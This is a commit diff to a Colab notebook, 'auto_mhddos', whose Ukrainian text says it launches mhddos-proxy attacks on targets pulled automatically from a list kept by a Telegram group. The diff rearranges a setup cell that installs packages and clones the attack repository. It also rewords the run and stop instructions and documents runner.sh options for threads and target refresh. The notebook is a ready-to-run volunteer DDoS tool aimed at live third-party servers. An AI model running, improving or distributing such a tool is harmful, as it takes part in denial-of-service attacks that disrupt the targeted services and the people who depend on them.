updated jupiter file

--- a/auto_mhddos.ipynb
+++ b/auto_mhddos.ipynb
@@ -22,11 +22,13 @@
    "source": [
     "###### Цей скрипт використовує [mhddos-proxy](https://github.com/porthole-ascend-cinnamon/mhddos_proxy) для атаки цілей [з цього списку](https://raw.githubusercontent.com/Aruiem234/auto_mhddos/main/runner_targets). Цілі підбираються та оновлюються автоматично телеграм групою [Український Жнець](https://t.me/ukrainian_reaper_ddos). Весь код має вільний доступ та викладено [тут](https://github.com/white-sagittarius/auto_mhddos). Слава Україні!\n",
     "---\n",
+    "<br/>\n",
     "\n",
-    "##### Для запуску: меню \"Runtime\" -> \"Run all\" (Ctrl/⌘ + F9)\n",
-    "##### Для зупинки або ручного рестарту: меню \"Runtime\" -> \"Mange sessions\" (можна зупиняти всі вкладки одночасно)\n",
+    "### Запуск: меню \"Runtime\" -> \"Run all\" (Ctrl/⌘ + F9)\n",
+    "### Зупинка або ручний рестарт: меню \"Runtime\" -> \"Mange sessions\" (можна зупиняти всі вкладки одночасно)\n",
     "\n",
-    "###### (якщо ви не бачите меню вгорі, вимкніть AdBlock)\n",
+    "###### Якщо ви не бачите меню вгорі, вимкніть AdBlock\n",
+    "<br/>\n",
     "\n",
     "---"
    ],
@@ -35,11 +37,33 @@
    }
   },
   {
+   "cell_type": "code",
+   "source": [
+    "!apt-get install ifstat -y &> /dev/null\n",
+    "!apt-get upgrade ifstat -y &> /dev/null\n",
+    "\n",
+    "!python -m pip uninstall google-colab datascience -y &> /dev/null\n",
+    "!python -m pip install --upgrade pip &> /dev/null\n",
+    "\n",
+    "%cd ~\n",
+    "\n",
+    "%rm -r auto_mhddos &> /dev/null\n",
+    "!git clone https://github.com/white-sagittarius/auto_mhddos.git &> /dev/null\n",
+    "%cd ~/auto_mhddos\n"
+   ],
+   "metadata": {
+    "id": "iwL1D0yQ2Y5X"
+   },
+   "execution_count": null,
+   "outputs": []
+  },
+  {
    "cell_type": "markdown",
    "source": [
+    "### Будь ласка, очікуйте виводу інформації щодо поточного стану атаки. Для першого запуску це може зайняти кілька хвилин\n",
+    "\n",
     "<details>\n",
-    "  <summary>Нажміть для перегдяду додаткової документації англійською (не обов'язково, це лише для дебагу та для впевнених користувачів)</summary>\n",
-    "    Parameters\n",
+    "  <summary><blockquote><i>для перегляду додаткових параметрів запуску натисніть на трикутник згори; це не обов'язково, лише для відладки та для впевнених користувачів</i></blockquote></summary>\n",
     "\n",
     "    `-r`, `--refresh-interval`. How frequently script should refresh targets. Download targets from [targets file](https://raw.githubusercontent.com/Aruiem234/auto_mhddos/main/runner_targets) every NUMBER time units. SUFFIX may be \"m\" for minutes, \"h\" for hours or \"d\" for days. Suggested range: [10m, 1d]. Default: \"15m\"\n",
     "\n",
@@ -71,43 +95,16 @@
     "    !bash runner.sh -r 3h -t 1000 -p 1 -s 10\n",
     "\n",
     "    Long and short options can be mixed in a single command. Order of options does not matter. No options are required.\n",
-    "</details>\n",
-    "\n",
-    "---\n",
-    "\n",
-    "###### Будь ласка, очікуйте, доки не з`явиться вивід швидкості. Для першого запуску це може зайняти кілька хвилин\n",
-    "\n",
-    "---"
+    "</details>\n"
    ],
    "metadata": {
-    "id": "8Uw9xUaMCq4x"
+    "collapsed": false
    }
-  },
-  {
-   "cell_type": "code",
-   "source": [
-    "!apt-get install ifstat -y &> /dev/null\n",
-    "!apt-get upgrade ifstat -y &> /dev/null\n",
-    "\n",
-    "!python -m pip uninstall google-colab datascience -y &> /dev/null\n",
-    "!python -m pip install --upgrade pip &> /dev/null\n",
-    "\n",
-    "%cd ~\n",
-    "\n",
-    "%rm -r auto_mhddos &> /dev/null\n",
-    "!git clone https://github.com/white-sagittarius/auto_mhddos.git &> /dev/null\n",
-    "%cd ~/auto_mhddos"
-   ],
-   "metadata": {
-    "id": "iwL1D0yQ2Y5X"
-   },
-   "execution_count": null,
-   "outputs": []
   },
   {
    "cell_type": "markdown",
    "source": [
-    "#### Поточна швидкість атаки:\n",
+    "### Поточний стан атаки\n",
     "###### [час, розбіжність 3 години] -> вхідна швидкість ↓MBit/s↓ -> вихідна швидкість ↑MBit/s↑"
    ],
    "metadata": {
